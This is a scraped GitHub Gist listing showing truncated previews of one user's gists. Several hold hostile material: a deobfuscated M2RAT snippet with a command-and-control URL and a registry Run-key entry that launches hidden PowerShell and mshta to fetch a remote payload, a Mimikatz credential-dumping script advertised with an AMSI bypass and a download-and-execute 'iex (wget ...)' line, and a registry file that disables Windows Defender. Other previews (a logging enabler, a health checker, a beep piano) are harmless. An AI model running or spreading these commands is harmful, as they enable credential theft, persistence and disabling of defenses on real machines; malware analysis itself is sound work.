Sh1n0g1 Sh1n0g1
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Deobfuscated M2RAT | |
| # Refer: https://asec.ahnlab.com/en/56857/ | |
| Start-Sleep -Seconds 68; | |
| $buffer = 1024 * 1024; | |
| $hostid = $env:COMPUTERNAME + '-' + $env:USERNAME; | |
| $C2_URL = 'http://navercorp.ru/dashboard/image/202302/com.php' + '?U=' + $hostid; | |
| $TEMPORARY_FILE = $env:TEMP + '\jXShAegMEWMw'; | |
| if (!(Test-Path$TEMPORARY_FILE)) { | |
| New-ItemProperty -Path HKCU:\Software\ Microsoft\Windows\CurrentVersion\Run -Name fGZtM -Value 'c:\windows\system32\cmd.exe /c PowerShell.exe -WindowStyle hidden -NoLogo -NonInteractive -ep bypass ping -n 1 -w 391763 2.2.2.2 || mshta http://navercorp.ru/dashboard/image/202302/4.html' -PropertyType String -Force; | |
| } |
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
Sh1n0g1
/ youtube-summarizer-with-langchain-chatgpt.ipynb
Last active
May 25, 2023 04:15
youtube-summarizer-with-langchain-chatgpt.ipynb
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
Sh1n0g1
/ Invoke-OneShot-Mimikatz.ps1
Last active
August 12, 2022 08:08
— forked from pich4ya/Invoke-OneShot-Mimikatz.ps1
Invoke-OneShot-Mimikatz.ps1 - One Shot for Mimikatz PowerShell Dump All Creds with AMSI Bypass 2022 Edition (Tested and worked on Windows 10 x64 patched 2022-03-26)
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Confirm it works in Windows 10 2022 | |
| # Dont download this but execute the next line in command prompt(cmd.exe) | |
| # powershell iex (wget https://gist.githubusercontent.com/Sh1n0g1/b93b48a54276145bd117403a38fd9816/raw/637d7447dc7a99e21cfeec18bec950abbc1bd642/Invoke-OneShot-Mimikatz.ps1).Content | |
| # You will get creds | |
| # | |
| # AMSI Bypass is copied from payatu's AMSI-Bypass (23-August-2021) | |
| # https://payatu.com/blog/arun.nair/amsi-bypass | |
| $code = @" | |
| using System; |
Sh1n0g1
/ DisableWindowsDefender2022.reg
Created
August 12, 2022 07:20
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Windows Registry Editor Version 5.00 | |
| [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender] | |
| "DisableAntiSpyware"=dword:00000001 | |
| "DisableRealtimeMonitoring"=dword:00000001 | |
| "DisableAntiVirus"=dword:00000001 | |
| "DisableSpecialRunningModes"=dword:00000001 | |
| "DisableRoutinelyTakingAction"=dword:00000001 | |
| "ServiceKeepAlive"=dword:00000000 |
Sh1n0g1
/ enable_powershell_logging.bat
Last active
March 19, 2021 20:47
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| @echo off | |
| net session >nul 2>&1 | |
| if %errorlevel% == 0 ( | |
| echo|set /p="Adding registry 1:" | |
| reg add HKLM\SOFTWARE\Wow6432Node\Policies\Microsoft\Windows\PowerShell\ /v EnableModuleLogging /f /t REG_DWORD /d 1 | |
| echo|set /p="Adding registry 2:" |
Sh1n0g1
/ webhealthcheck.py
Created
May 18, 2020 01:38
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!python3 | |
| import requests | |
| import time | |
| URL= [ | |
| 'http://shino.club/ ', | |
| 'https://shinobot.com/ ', | |
| 'https://mnd2015.info/ ', | |
| 'https://shinosec.com/ ', |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| $assemblies=( | |
| "System" | |
| ) | |
| $source=@" | |
| using System; | |
| namespace Helloworld | |
| { | |
| public static class Hello{ | |
| public static void Main(){ |
Sh1n0g1
/ Play-ShinoTone
Created
August 25, 2017 13:54
Powershell-based piano using the Console Beep.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Function Play-ShinoTone{ | |
| cls | |
| $octave=2 | |
| $keytone=@{ # http://pages.mtu.edu/~suits/notefreqs.html | |
| 'a'=261.63*$octave; # C | |
| 'w'=277.18*$octave; # C# | |
| 's'=293.66*$octave; # D | |
| 'e'=311.13*$octave; # D# | |
| 'd'=329.63*$octave; # E | |
| 'f'=349.23*$octave; # F |
NewerOlder